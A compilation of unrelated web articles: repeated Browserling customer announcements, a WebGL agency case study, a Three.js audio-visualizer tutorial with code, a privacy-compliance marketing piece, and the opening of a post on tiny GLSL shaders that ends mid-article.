Success! Publuu, a leader in digital publishing, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
What Is Browserling?
Browserling is a cross-browser testing service that lets users test websites and web applications in different browsers to ensure they work correctly. It also works as a browser sandbox, allowing users to safely check suspicious links and web pages without affecting their own devices. Developers, testers, and regular users can use it to see how websites look and behave across different browsers. IT security professionals find it useful for safely analyzing links and identifying potential vulnerabilities in a secure environment.
Who Uses Browserling?
Browserling has now become the cross-browser testing service of choice and it’s used by hundreds of thousands of users around the world every month. Browserling’s customers include governments, states, cities, banks, stock exchanges, universities, newspapers, and Fortune 100 companies.
Success! Pelican, a top provider of protective equipment, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
What Is Browserling?
Browserling is a cross-browser testing service that lets users test websites and web applications in different browsers to ensure they work correctly. It also works as a browser sandbox, allowing users to safely check suspicious links and web pages without affecting their own devices. Developers, testers, and regular users can use it to see how websites look and behave across different browsers. IT security professionals find it useful for safely analyzing links and identifying potential vulnerabilities in a secure environment.
Who Uses Browserling?
Browserling has now become the cross-browser testing service of choice and it’s used by hundreds of thousands of users around the world every month. Browserling’s customers include governments, states, cities, banks, stock exchanges, universities, newspapers, and Fortune 100 companies.
KODE Immersive fuses AR, VR, real-time 3D, and spatial computing to craft high-impact, interactive experiences. It’s not just a platform – it’s a portal. Designed to ignite emotion, shatter expectations, and redefine digital engagement.
Our challenge? To bring this pioneering vision to life, not just by explaining what KODE Immersive is, but by making visitors experience what it’s like to be inside it.
Background
Our relationship with KODE began in 2022 when we extended their brand identity and reimagined their digital home. What started as a brand refresh quickly evolved into a creative partnership rooted in shared values and a mutual obsession with crafted brand experience and beautiful design.
In late 2024, KODE approached us with a new venture. This time, they were diving headfirst into emerging technologies (AI, WebXR, and real-time 3D) to expand their service offering. We knew immediately, this was the kind of project you dream about. It was a timely opportunity and got us excited to push boundaries.
The Brief
The brief was as open as it gets. Beyond a few core objectives (namely, budget and timeline), there were no strict constraints. We received a three-slide deck: a name, a positioning statement, three brand pillars (CREATE, IDEATE, DELIVER), and a few straplines.
No case studies. No visual identity. Just a bold vision.
And that freedom became our greatest asset. We built everything from scratch, visual language, tone, interactions, while staying mindful of budget and speed. Our approach: move fast, iterate often, and push boundaries.
To pull it off, we adopted a phased R&D process. We teamed up with the brilliant Francesco Michelini (who previously helped build the Malvah website). Francesco lives and breathes WebGL. He once spent a week refining a mechanic we had already agreed to abandon, just because he couldn’t accept defeat. That kind of drive made him the perfect collaborator.
Our Process
We used KODE Immersive as a live testing ground for our refined four-phase process, aimed at delivering the best creative solutions while avoiding unnecessary feedback loops. Here’s how it shaped the final outcome.
01 Discover
We kicked things off with an in-depth strategy session where we unpacked the brief, explored concepts, discussed competitors, and mapped out technical possibilities. Style tiles helped form the foundation of our visual language.
Typography was the key differentiator. We knew the right typeface would communicate innovation and intent. After multiple rounds, we landed on Brut by Off-Type – an unconventional mono-inspired form that struck just the right balance of structure and tension.
Colour took cues from the parent brand, but we flipped the hierarchy. Orange became the dominant tone, with bold black moments layered throughout. Familiar, yet distinctive.
Iconography evolved from KODE’s chevron mark. We repurposed it as a modular, dynamic system to guide interactions and reflect the brand’s three core pillars.
02 Create
This phase became interesting, since the experience would rely heavily on user interaction, this phase was driven more by prototyping than traditional design. We worked in tight, iterative loops with the client, across design, 3D, and development to test feasibility early and often. It became an it was extremely organic process and ideal to reach the deadline while stretching limitations.
From the start, we knew we didn’t just want users to interact—we wanted them to feel immersed. To lose track of time by being emotionally and mentally engaged.
We developed a range of 3D concepts in Cinema 4D and funnelled them through R&D cycles. The process required a lot of iterating and relooking creative solutions, but was always collaborative – and ultimately, essential for innovation.
03 Craft
This is where the magic happens.
Our craft is what we consider our special sauce at Malvah – this is where we like to push, refine, and design with intent and clarity. It’s hard not to get lost in the sauce. Massive respect for Francesco during this phase as it is the most intense in terms of iterations, from shader logic to ambient lighting to the haptic quality of cursor interactions, and every component was built to feel immersive yet effortless. Luckily, Francesco is an actual living wizard and provided us with testing environments where we could craft all these elements seamlessly.
Still, something was missing! The high-fidelity 3D was clashing with the flat backgrounds. The fix? A subtle layer of pixel distortion and soft noise texture. Minimal, but transformative. Suddenly, the whole experience felt unified – like everything belonged as one unified, harmonious experience.
04 Deliver
By final QA, most of the heavy lifting was done. We stress-tested performance across browsers, devices, and connection speeds. We refined micro-interactions and polished details based on early user feedback.
Tech Stack
Nerd stuff alert.
From the outset, this was always going to be a Three.js and WebGL project – not for the novelty, but for the storytelling power. Real-time 3D let us turn a static brand into a living, breathing experience. We used Cinema 4D for concepting and prototyping, from early ideation through to final modelling and meta-cap creation.
One of the most impactful performance optimisations came through the use of BatchedMesh, which enabled us to draw multiple meshes sharing the same material in a single draw call. Since draw calls are among the most expensive operations in WebGL, this dramatically improved efficiency, reducing calls from 40 or 50 down to just one. You’ll see this in action in both the hero section and the footer, where we also implemented the Rapier physics engine for dynamic interaction.
The real breakthrough, however, was moving the rendering of our most resource-intensive canvases to an OffscreenCanvas, with all related logic handled inside a WebWorker. This shift happened later in the project and required significant reworking, but the gains in performance and responsiveness were undeniable. It was a technically ambitious move, but one that paid off.
Features
The site follows a continuous scroll narrative—a careful dance between interactivity, emotion, and information. With the primary goal to provoke curiosity and invite deep engagement, rom top to bottom, here’s a rundown of our favourite features.
Chevron
We land on the hero of the brand, the logo-mark. The chevron is the anchor, both literally and metaphorically. The driving force behind the iconography that would funnel through the experience. We wanted the entry point to set the tone, bold, dynamic, and intuitive for the user to explore.
Shifting Text
One of those happy accidents. Inspired by a line that didn’t make the final copy, we developed a mechanic where text splits and shifts as the cursor moves. A metaphor for deconstruction and reformation – fluid, dynamic, alive.
Icons
A playful space to explore, discover, and interact. Designed to echo the brand’s chevron and embody its core pillars.
Menu
One of our favourite elements. It subverts the typical UX pattern by growing from the base and transforming into the footer as users scroll; a small disruption that makes a big impact.
SFX
Sound is often the unsung hero. We follow the 80/20 rule here, also known as the Pareto Principle —just the right amount to amplify emotion without overwhelming the experience. From section transitions to hover feedback, the layered soundscape adds depth and atmosphere. The transition from the landing section to the services has the user feeling as if they are entering a new realm.
We worked with Martin Leitner from Sounds Good to curate the sound elements in aiding the experience and bringing the interaction with the 3D elements to life. This was such a great experience, and Martin’s enthusiasm helped drive the process and the team’s excitement.
Easter Egg
We always planned for an easter egg, we just didn’t know what it was until it revealed itself.
A sketch mechanic, pulled from KODE’s visual identity, was integrated into the cursor. Users can draw on the screen to reveal a hidden layer; a playful nod to the analogue-digital duality of the brand.
Early testers were missing it entirely. So we added a subtle auto-activation trigger at just the right moment. Problem solved.
Reflections
This project reminded us that the best results often emerge from ambiguity. No case studies. No visual assets. No roadmap. Just vision and trust.
While we’re proud of what we’ve delivered, we’ve only scratched the surface. Phase Two will introduce interactive case studies and deeper storytelling. We’re especially excited to explore a z-axis scroll journey through each service, bringing dimension and discovery to the next level.For now, KODE Immersive is live.
Success! Amnesty International, a global advocate for human rights, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
What Is Browserling?
Browserling is a cross-browser testing service that lets users test websites and web applications in different browsers to ensure they work correctly. It also works as a browser sandbox, allowing users to safely check suspicious links and web pages without affecting their own devices. Developers, testers, and regular users can use it to see how websites look and behave across different browsers. IT security professionals find it useful for safely analyzing links and identifying potential vulnerabilities in a secure environment.
Who Uses Browserling?
Browserling has now become the cross-browser testing service of choice and it’s used by hundreds of thousands of users around the world every month. Browserling’s customers include governments, states, cities, banks, stock exchanges, universities, newspapers, and Fortune 100 companies.
Sound is vibration, vision is vibration you can see. I’m always chasing the moment those waves overlap. For a recent Webflow & GSAP community challenge focusing on GSAP Draggable and Inertia Plugin, I decided to push the idea further by building a futuristic audio-reactive visualizer. The concept was to create a sci-fi “anomaly detector” interface that reacts to music in real time, blending moody visuals with sound.
The concept began with a simple image in my mind: a glowing orange-to-white sphere sitting alone in a dark void, the core that would later pulse with the music. To solidify the idea, I ran this prompt through Midjourney: “Glowing orange and white gradient sphere, soft blurry layers, smooth distortion, dark black background, subtle film-grain, retro-analog vibe, cinematic lighting.” After a few iterations I picked the frame that felt right, gave it a quick color pass in Photoshop, and used that clean, luminous orb as the visual foundation for the entire audio-reactive build.
Midjourney explorations
The project was originally built as an entry for the Webflow × GSAP Community Challenge (Week 2: “Draggable & Inertia”), which encouraged the use of GSAP’s dragging and inertia capabilities. This context influenced the features: I made the on-screen control panels draggable with momentum, and even gave the 3D orb a subtle inertia-driven movement when “flung”. In this article, I’ll walk you through the entire process – from setting up the Three.js scene and analyzing audio with the Web Audio API, to creating custom shaders and adding GSAP animations and interactivity. By the end, you’ll see how code, visuals, and sound come together to create an immersive audio visualizer.
Setting Up the Three.js Scene
To build the 3D portion, I used Three.js to create a scene containing a dynamic sphere (the “anomaly”) and other visual elements.
We start with the usual Three.js setup: a scene, a camera, and a renderer. I went with a perspective camera to get a nice 3D view of our orb and placed it a bit back so the object is fully in frame.
An OrbitControls is used to allow basic click-and-drag orbiting around the object (with some damping for smoothness). Here’s a simplified snippet of the initial setup:
// Initialize Three.js scene, camera, renderer
const scene = new THREE.Scene();
const camera = new THREE.PerspectiveCamera(75, window.innerWidth/window.innerHeight, 0.1, 100);
camera.position.set(0, 0, 10); // camera back a bit from origin
const renderer = new THREE.WebGLRenderer({ antialias: true });
renderer.setSize(window.innerWidth, window.innerHeight);
document.body.appendChild(renderer.domElement);
// Add OrbitControls for camera rotation
const controls = new THREE.OrbitControls(camera, renderer.domElement);
controls.enableDamping = true;
controls.dampingFactor = 0.1;
controls.rotateSpeed = 0.5;
controls.enableZoom = false; // lock zoom for a more fixed view
Next, I created the anomaly object. This is the main feature: a spiky wireframe sphere that reacts to audio. Three.js provides shapes like SphereGeometry or IcosahedronGeometry that we can use for a sphere. I chose an icosahedron geometry because it gives an interesting multi sided look and allows easy control of detail (via a subdivision level). The anomaly is actually composed of two overlapping parts:
Outer wireframe sphere: An IcosahedronGeometry with a custom ShaderMaterial that draws it as a glowing wireframe. This part will distort based on music (imagine it “vibrating” and morphing with the beat).
Inner glow sphere: A slightly larger SphereGeometry drawn with a semi-transparent, emissive shader (using the backside of the geometry) to create a halo or aura around the wireframe. This gives the orb a warm glow effect, like an energy field.
I also added in some extra visuals: a field of tiny particles floating in the background (for a depth effect, like dust or sparks) and a subtle grid overlay in the UI (more on the UI later). The scene’s background is set to a dark color, and I layered a background image (the edited Midjourney visual) behind the canvas to create the mysterious-alien landscape horizon. This combination of 3D objects and 2D backdrop creates the illusion of a holographic display over a planetary surface.
Integrating the Web Audio API for Music Analysis
With the 3D scene in place, the next step was making it respond to music. This is where the Web Audio API comes in. I allowed the user to either upload an audio file or pick one of the four provided tracks. When the audio plays, we tap into the audio stream and analyze its frequencies in real-time using an AnalyserNode. The AnalyserNode gives us access to frequency data. This is a snapshot of the audio spectrum (bass, mids, treble levels, etc.) at any given moment, which we can use to drive animations.
To set this up, I created an AudioContext and an AnalyserNode, and connected an audio source to it. If you’re using an <audio> element for playback, you can create a MediaElementSource from it and pipe that into the analyser. For example:
// Create AudioContext and Analyser
const audioContext = new (window.AudioContext || window.webkitAudioContext)();
const analyser = audioContext.createAnalyser();
analyser.fftSize = 2048; // Use an FFT size of 2048 for analysis
analyser.smoothingTimeConstant = 0.8; // Smooth out the frequencies a bit
// Connect an audio element source to the analyser
const audioElement = document.getElementById('audio-player'); // <audio> element
const source = audioContext.createMediaElementSource(audioElement);
source.connect(analyser);
analyser.connect(audioContext.destination); // connect to output so sound plays
Here we set fftSize to 2048, which means the analyser will break the audio into 1024 frequency bins (frequencyBinCount is half of fftSize). We also set a smoothingTimeConstant to make the data less jumpy frame-to-frame. Now, as the audio plays, we can repeatedly query the analyser for data. The method analyser.getByteFrequencyData(array) fills an array with the current frequency magnitudes (0–255) across the spectrum. Similarly, getByteTimeDomainData gives waveform amplitude data. In our animation loop, I call analyser.getByteFrequencyData() on each frame to get fresh data:
const frequencyData = new Uint8Array(analyser.frequencyBinCount);
function animate() {
requestAnimationFrame(animate);
// ... update Three.js controls, etc.
if (analyser) {
analyser.getByteFrequencyData(frequencyData);
// Compute an average volume level from frequency data
let sum = 0;
for (let i = 0; i < frequencyData.length; i++) {
sum += frequencyData[i];
}
const average = sum / frequencyData.length;
let audioLevel = average / 255; // normalize to 0.0–1.0
// Apply a sensitivity scaling (from a UI slider)
audioLevel *= (sensitivity / 5.0);
// Now audioLevel represents the intensity of the music (0 = silence, ~1 = very loud)
}
// ... (use audioLevel to update visuals)
renderer.render(scene, camera);
}
In my case, I also identified a “peak frequency” (the frequency bin with the highest amplitude at a given moment) and some other metrics just for fun, which I display on the UI (e.g. showing the dominant frequency in Hz, amplitude, etc., as “Anomaly Metrics”). But the key takeaway is the audioLevel – a value representing overall music intensity – which we’ll use to drive the 3D visual changes.
Syncing Audio with Visuals: Once we have audioLevel, we can inject it into our Three.js world. I passed this value into the shaders as a uniform every frame, and also used it to tweak some high-level motion (like rotation speed). Additionally, GSAP animations were triggered by play/pause events (for example, a slight camera zoom when music starts, which we’ll cover next). The result is that the visuals move in time with the music:louder or more intense moments in the audio make the anomaly glow brighter and distort more, while quiet moments cause it to settle down.
Creating the Audio-Reactive Shaders
To achieve the dynamic look for the anomaly, I used custom GLSL shaders in the material. Three.js lets us write our own shaders via THREE.ShaderMaterial, which is perfect for this because it gives fine-grained control over vertex positions and fragment colors. This might sound difficult if you’re new to shaders, but conceptually we did two major things in the shader:
Vertex Distortion with Noise: We displace the vertices of the sphere mesh over time to make it wobble and spike. I included a 3D noise function (Simplex noise) in the vertex shader – it produces a smooth pseudo-random value for any 3D coordinate. For each vertex, I calculate a noise value based on its position (plus a time factor to animate it). Then I move the vertex along its normal by an amount proportional to that noise. We also multiply this by our audioLevel and a user-controlled distortion factor. Essentially, when the music is intense (high audioLevel), the sphere gets spikier and more chaotic; when the music is soft or paused, the sphere is almost smooth.
Fresnel Glow in Fragment Shader: To make the wireframe edges glow and fade realistically, I used a fresnel effect in the fragment shader. This effect makes surfaces more luminous at glancing angles. We calculate it by taking the dot product of the view direction and the vertex normal – it results in a value that’s small on edges (grazing angles) and larger on faces directly facing the camera. By inverting and exponentiating this, we get a nice glow on the outline of the sphere that intensifies at the edges. I modulated the fresnel intensity with the audioLevel as well, so the glow pulsates with the beat.
Let’s look at a simplified version of the shader code for the outer wireframe sphere material:
const outerMaterial = new THREE.ShaderMaterial({
uniforms: {
time: { value: 0 },
audioLevel:{ value: 0 }, // this will be updated each frame
distortion:{ value: 1.0 },
color: { value: new THREE.Color(0xff4e42) } // a reddish-orange base color
},
wireframe: true,
transparent: true,
vertexShader: `
uniform float time;
uniform float audioLevel;
uniform float distortion;
// (noise function omitted for brevity)
void main() {
// Start with the original position
vec3 pos = position;
// Calculate procedural noise value for this vertex (using its position and time)
float noise = snoise(pos * 0.5 + vec3(0.0, 0.0, time * 0.3));
// Displace vertex along its normal
pos += normal * noise * distortion * (1.0 + audioLevel);
// Standard transformation
gl_Position = projectionMatrix * modelViewMatrix * vec4(pos, 1.0);
}
`,
fragmentShader: `
uniform vec3 color;
uniform float audioLevel;
varying vec3 vNormal;
varying vec3 vPosition;
void main() {
// Calculate fresnel (view-angle dependent) term
vec3 viewDir = normalize(cameraPosition - vPosition);
float fresnel = 1.0 - max(0.0, dot(viewDir, vNormal));
fresnel = pow(fresnel, 2.0 + audioLevel * 2.0);
// Make the fragment color brighter on edges (fresnel) and pulse it slightly with time
float pulse = 0.8 + 0.2 * sin(time * 2.0);
vec3 emissiveColor = color * fresnel * pulse * (1.0 + audioLevel * 0.8);
// Alpha fade out a bit when audio is high (to make spikes more ethereal)
float alpha = fresnel * (0.7 - audioLevel * 0.3);
gl_FragColor = vec4(emissiveColor, alpha);
}
`
});
In this shader, snoise is a Simplex noise function (not shown above) producing values ~-1 to 1. The vertex shader uses it to offset each vertex (pos += normal * noise * …). We multiply the noise by (1.0 + audioLevel) so that when audioLevel rises, the displacement increases. The distortion uniform is controlled by a slider in the UI, so the user can manually dial the overall spikiness. The fragment shader calculates a fresnel factor to make the wireframe edges glow. Notice how audioLevel factors into the power and into the final color intensity – louder audio makes the fresnel exponent higher (sharper glow) and also increases brightness a bit. We also included a gentle pulsing (sin(time)) independent of audio, just to give a constant breathing motion.
For the inner glow sphere, we used a separate ShaderMaterial: it’s basically a sphere drawn with side: THREE.BackSide (so we see the inner surface) and Additive Blending to give a blooming halo. Its fragment shader also uses a fresnel term, but with a much lower alpha so it appears as a soft haze around the orb. The inner sphere’s size is slightly larger (I used about 1.2× the radius of the outer sphere) so that the glow extends beyond the wireframe. When combined, the outer and inner shaders create the effect of a translucent, energy-filled orb whose surface ripples with music.
To tie it all together, every frame in the render loop I update the shader uniforms with the current time and audio level:
// in the animation loop:
outerMaterial.uniforms.time.value = elapsedTime;
outerMaterial.uniforms.audioLevel.value = audioLevel;
outerMaterial.uniforms.distortion.value = currentDistortion;
glowMaterial.uniforms.time.value = elapsedTime;
glowMaterial.uniforms.audioLevel.value = audioLevel;
The result is a 3D object that truly feels alive with the music, it oscillates, pulses, and glows in sync with whatever track is playing. Even the one you add.
Animations and Interactions with GSAP
With the visuals reacting to sound, I added GSAP to handle smooth animations and user interactions. GSAP is great for creating timeline sequences and tweening properties with easing, and it also comes with plugins that were perfect for this project: Draggable for click-and-drag UI, and InertiaPlugin for momentum. Best of all, every GSAP plugin is now completely free to use. Below are the key ways I used GSAP in the project:
Intro Animation & Camera Movement: When the user selects a track and hits play, I trigger a brief “activation” sequence. This involves some text appearing in the “terminal” and a slight camera zoom-in toward the orb to signal that the system is online. The camera movement was done with a simple GSAP tween of the camera’s position. For example, I defined a default camera position and a slightly closer “zoomed” position. On play, I use gsap.to() to interpolate the camera position to the zoomed-in coordinates, and on pause/stop I tween it back out. GSAP makes this kind of 3D property animation straightforward:
const defaultCameraPos = { x: 0, y: 0, z: 10 };
const zoomedCameraPos = { x: 0, y: 0, z: 7 }; // move camera closer on zoom
function zoomCameraForAudio(zoomIn) {
const target = zoomIn ? zoomedCameraPos : defaultCameraPos;
gsap.to(camera.position, {
x: target.x,
y: target.y,
z: target.z,
duration: 1.5,
ease: "power2.inOut"
});
}
// When audio starts:
zoomCameraForAudio(true);
// When audio ends or is stopped:
zoomCameraForAudio(false);
This smooth zoom adds drama when the music kicks in, drawing the viewer into the scene. The power2.inOut easing gives it a nice gentle start and stop. I also used GSAP timelines for any other scripted sequences (like fading out the “Analyzing…” overlay text after a few seconds, etc.), since GSAP’s timeline control is very handy for orchestrating arranging multiple animations in order.
Draggable UI Panels: The interface has a few UI components overlaying the 3D canvas – e.g. an “Anomaly Controls” panel (with sliders for rotation speed, distortion amount, etc.), an “Audio Spectrum Analyzer” panel (showing a bar graph of frequencies and track selection buttons), and a “System Terminal” readout (displaying log messages like a console). To make the experience playful, I made these panels draggable. Using GSAP’s Draggable plugin, I simply turned each .panel element into a draggable object:
Draggable.create(".panel", {
type: "x,y",
bounds: "body", // confine dragging within the viewport
inertia: true, // enable momentum after release
edgeResistance: 0.65, // a bit of resistance at the edges
onDragStart: () => { /* bring panel to front, etc. */ },
onDragEnd: function() {
// Optionally, log the velocity or other info for fun
console.log("Panel thrown with velocity:", this.getVelocity());
}
});
Setting inertia: true means when the user releases a panel, it will continue moving in the direction they tossed it, gradually slowing to a stop (thanks to InertiaPlugin). This little touch makes the UI feel more tactile and real – you can flick the panels around and they slide with some “weight.” According to GSAP’s docs, Draggable will automatically handle the physics when inertia is enabled , so it was plug-and-play. I also constrained dragging within the body bounds so panels don’t get lost off-screen. Each panel has a clickable header (a drag handle area), set via the handle option, to restrict where a user can grab it. Under the hood, InertiaPlugin calculates the velocity of the drag and creates a tween that smoothly decelerates the element after you let go, mimicking friction.
Interactive Orb Drag (Bonus): As a creative experiment, I even made the 3D anomaly orb itself draggable. This was a bit more involved since it’s not a DOM element, but I implemented it by raycasting for clicks on the 3D object and then rotating the object based on mouse movement. I applied a similar inertia effect manually: when you “throw” the orb, it keeps spinning and slowly comes to rest. This wasn’t using GSAP’s Draggable directly (since that works in screen space), but I did use the InertiaPlugin concept by capturing the drag velocity and then using an inertial decay on that velocity each frame. It added a fun way to interact with the visualizer – you can nudge the orb and see it respond physically. For example, if you drag and release quickly, the orb will continue rotating with momentum. This kind of custom 3D dragging is outside the scope of a basic tutorial, but it shows how you can combine your own logic with GSAP’s physics concepts to enrich interactions.
GSAP Draggable and Inertia in action
In summary, GSAP handles all the non-audio animations: the camera moves, panel drags, and little transitions in the UI. The combination of sound-reactive shader animations (running every frame based on audio data) and event-based GSAP tweens (triggered on user actions or certain times) gives a layered result where everything feels responsive and alive.
UI and Atmosphere
Finally, a few words about the surrounding UI/atmosphere which glue the experience together. The visualizer’s style was inspired by sci-fi control panels, so I leaned into that:
Control Panels and Readouts: I built the overlay UI with HTML/CSS, keeping it minimalistic (just semi-transparent dark panels with light text and a few sliders/buttons). Key controls include rotation speed (how fast the orb spins), resolution (tessellation level of the icosahedron mesh), distortion amount, audio reactivity (scaling of audio impact), and sensitivity (which adjusts how the audio’s volume is interpreted). Changing these in real-time immediately affects the Three.js scene – for example, dragging the “Resolution” slider rebuilds the icosahedron geometry with more or fewer triangles, which is a cool way to see the orb go from coarse to finely subdivided. The “Audio Spectrum Analyzer” panel displays a classic bar graph of frequencies (drawn on a canvas using the analyser data) so you have a 2D visualization accompanying the 3D one. There’s also a console-style terminal readout that logs events (like “AUDIO ANALYSIS SYSTEM INITIALIZED” or the velocity of drags in a playful GSAP log format) to reinforce the concept of a high-tech system at work.
Design elements: To boost the sci-fi feel, I added a subtle grid overlay across the whole screen. This was done with pure CSS – a pair of repeating linear gradients forming horizontal and vertical lines (1px thin, very transparent) over a transparent background . It’s barely noticeable but gives a technical texture, especially against the glow of the orb. I also added some drifting ambient particles (tiny dots) floating slowly in the background, implemented as simple divs animated with JavaScript. They move in pseudo-random orbits.
Soundtrack: I curated three atmospheric and moody tracks, along with one of my own unreleased tracks, under my music alias LXSTNGHT. The track was produced in Ableton, and it’s unfinished. The end result is an experience where design, code, and music production collide in real time.
Bringing all these elements together, the final result is an interactive art piece: you load a track, the “Audio ARK” system comes online with a flurry of text feedback, the ambient music starts playing, and the orb begins to pulse and mutate in sync with the sound. You can tweak controls or toss around panels (or the orb itself) to explore different visuals.
The combination of Three.js (for rendering and shader effects), Web Audio API (for sound analysis), and GSAP (for polished interactions) showcases how creative coding tools can merge to produce an immersive experience that engages multiple senses.
As data privacy laws evolve globally—from the GDPR to India’s Digital Personal Data Protection Act (DPDPA)—one common theme emerges: empowering individuals with control over their data. This shift places data principal rights at the center of privacy compliance.
Respecting these rights isn’t just a legal obligation for organizations; it’s a business imperative. Efficiently operationalizing and fulfilling data principal rights is now a cornerstone of modern privacy programs.
Understanding Data Principal Rights
Data principal rights refer to the entitlements granted to individuals regarding their data. Under laws like the DPDPA and GDPR, these typically include:
Right to Access: Individuals can request a copy of the personal data held about them.
Right to Correction: They can demand corrections to inaccurate or outdated data.
Right to Erasure (Right to Be Forgotten): They can request deletion of their data under specific circumstances.
Right to Data Portability: They can request their data in a machine-readable format.
Right to Withdraw Consent: They can withdraw previously given consent for data processing.
Right to Grievance Redressal: They can lodge complaints if their rights are not respected.
While these rights sound straightforward, fulfilling them at scale is anything but simple, especially when data is scattered across cloud platforms, internal systems, and third-party applications.
Why Data Principal Rights Management is Critical
Regulatory Compliance and Avoidance of Penalties
Non-compliance can result in substantial fines, regulatory scrutiny, and reputational harm. For instance, DPDPA empowers the Data Protection Board of India to impose heavy penalties for failure to honor data principal rights on time.
Customer Trust and Transparency
Respecting user rights builds transparency and demonstrates that your organization values privacy. This can increase customer loyalty and strengthen brand reputation in privacy-conscious markets.
Operational Readiness and Risk Reduction
Organizations risk delays, errors, and missed deadlines when rights requests are handled manually. An automated and structured rights management process reduces legal risk and improves operational agility.
Auditability and Accountability
Every action taken to fulfill a rights request must be logged and documented. This is essential for proving compliance during audits or investigations.
The Role of Data Discovery in Rights Fulfilment
To respond to any data principal request, you must first know where the relevant personal data resides. This is where Data Discovery plays a crucial supporting role.
A robust data discovery framework enables organizations to:
Identify all systems and repositories that store personal data.
Correlate data to specific individuals or identifiers.
Retrieve, correct, delete, or port data accurately and quickly.
Without comprehensive data visibility, any data principal rights management program will fail, resulting in delays, partial responses, or non-compliance.
Key Challenges in Rights Management
Despite its importance, many organizations struggle with implementing effective data principal rights management due to:
Fragmented data environments: Personal data is often stored in silos, making it challenging to aggregate and act upon.
Manual workflows: Fulfilling rights requests often involves slow, error-prone manual processes.
Authentication complexities: Verifying the identity of the data principal securely is essential to prevent abuse of rights.
Lack of audit trails: Without automated tracking, it’s hard to demonstrate compliance.
Building a Scalable Data Principal Rights Management Framework
To overcome these challenges, organizations must invest in technologies and workflows that automate and streamline the lifecycle of rights requests. A mature data principal rights management framework should include:
Centralized request intake: A portal or dashboard where individuals can easily submit rights requests.
Automated data mapping: Leveraging data discovery tools to locate relevant personal data quickly.
Workflow automation: Routing requests to appropriate teams with built-in deadlines and escalation paths.
Verification and consent tracking: Only verified individuals can initiate requests and track their consent history.
Comprehensive logging: Maintaining a tamper-proof audit trail of all actions to fulfill requests.
The Future of Privacy Lies in Empowerment
As data privacy regulations mature, the focus shifts from mere protection to empowerment. Data principles are no longer passive subjects but active stakeholders in handling their data. Organizations that embed data principal rights management into their core data governance strategy will stay compliant and gain a competitive edge in building customer trust.
Empower Your Privacy Program with Seqrite
Seqrite’s Data Privacy Suite is purpose-built to help enterprises manage data principal rights confidently. From automated request intake and identity verification to real-time data discovery and audit-ready logs, Seqrite empowers you to comply faster, smarter, and at scale.
Success! Singapore Telecommunications (Singtel) is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
What Is Browserling?
Browserling is a cross-browser testing service that lets users test websites and web applications in different browsers to ensure they work correctly. It also works as a browser sandbox, allowing users to safely check suspicious links and web pages without affecting their own devices. Developers, testers, and regular users can use it to see how websites look and behave across different browsers. IT security professionals find it useful for safely analyzing links and identifying potential vulnerabilities in a secure environment.
Who Uses Browserling?
Browserling has now become the cross-browser testing service of choice and it’s used by hundreds of thousands of users around the world every month. Browserling’s customers include governments, states, cities, banks, stock exchanges, universities, newspapers, and Fortune 100 companies.
Hi, I’m Xor. As a graphics programmer, my job is essentially to make pixels prettier using math formulas. I work on
video effects like lighting, reflections, post-processing, and more for games and animated backgrounds in software.
For fun, I like to unwind by writing compact little shader programs that fit in a “tweet” (280 characters or less).
You may have seen some of these posted on X/Twitter. The process of shrinking code while maintaining its functionality
is called “code golfing.”
Here’s an animated galaxy I wrote in just 197 characters of GLSL code:
This little piece of code runs in real time for every pixel on the screen and generates a unique output color using
some fancy math and logic. I build these demos using a tool called Twigl.app
, an online shader editor designed for sharing mini-shaders. It makes exporting videos super easy, and in its
“geekiest” mode, it also takes care of the generic header code and shortens built-in variable names.
I even managed to fit a voxel DDA raytracer with edge detection into just 190 characters:
Today, I’d like to explain why I make these, share my creation process, and show you how you can try it yourself if
you’re interested. Let’s start with the “why.”
Motivation
Why do I write these? Well, there are several factors. Since I like lists, I’ll go ahead and present them in order of
relevance:
Curiosity and Passion
: Sometimes I get struck by a new idea and just want to play around with it. I like Twigl because it helps lower my
expectations and lets me start doodling. There’s less room for overplanning, and it’s super easy to jump in.
Learning and Discovery
: Working within constraints forces me to think through problems differently. By optimizing for code size, I often
find ways to simplify or approximate. It doesn’t always lead to more performant code (but often it does) and I’ve
learned how to squeeze the most out of every byte. Having very little code makes it easier to experiment with
formulas and variations without getting overwhelmed.
Challenge
: Writing tiny code is both challenging and stimulating. It keeps my brain sharp, and I’m constantly developing new
skills. It’s basically become a game for me. I’ve accidentally learned a ton of math while trying to solve these
technical problems.
Community
: I’ve connected with so many interesting people through this process—artists, designers, math folks, game devs,
engineers, tech enthusiasts, and more. Sharing my work has led to some exciting encounters. (More on some notable
people later!)
So, in short, it’s fun, thought-provoking, and engaging, and it’s a great way to spark interest in graphics
programming. Now, what even is a shader?
Shader Introduction
In case you haven’t heard of shaders before, they are programs that run on the GPU (Graphics Processing Unit) instead
of the CPU (Central Processing Unit). CPUs excel at complicated or branching operations, which are computed
sequentially, one at a time (I’m simplifying here). GPUs are designed to process billions or trillions of predictable
operations per second in parallel. This sounds like a lot, but a 4K screen at 60 frames per second outputs nearly 500M
pixels per second. Each pixel could have 100s or 1,000s of operations, not to mention anything else the GPU might be
used for.
There are several different types of shaders: vertex shaders, fragment shaders, compute shaders, and more, but these
tweet shaders are specifically fragment shaders, also known as “pixel shaders,” because they run on every pixel. In
essence, fragment shaders take the input fragment coordinates and output a color and opacity (or alpha). Fragment
coordinates give you the position of the center of each pixel on screen, so (0.5, 0.5) is the bottom-left (or
top-left). One pixel to the right is (1.5, 0.5), and so on to (width – 0.5, height – 0.5). The coordinates variable is
called “FC” in Twigl. The output color, “o”, has 4 RGBA components: red, green, blue, and alpha, each ranging from 0.0
to 1.0.
(1.0, 1.0, 1.0, 1.0)
is pure white, (0.0, 0.0, 0.0, 1.0)
is opaque black, and (1.0, 0.0, 0.0, 1.0)
is pure red in the RGBA color format. From here, you can already make simple color gradients:
o = vec4(0.0, FC.y/100.0, 0.0, 1.0)
;
Remember, this is run on every pixel, so each pixel will have a unique Fragment Coordinate. That formula makes a
simple gradient that starts black at the bottom of the screen (FC.y = 0.0), and the green output value reaches 1.0
when FC.y reaches 100.0.
So you have an output color “o”, the input fragment coordinates “FC”, and four “uniform” inputs which are shared among
all pixels: “r” is the shader screen resolution in pixels, “t” is the time in seconds, and also the less commonly used
mouse position “m” and the backbuffer texture “b”. And that’s the core of it! From there, it’s a lot of math and logic
to control the output colors and generate cool images.
I’m going to skip ahead a bit, but if you’re interested in learning more, try starting here
!
My Process
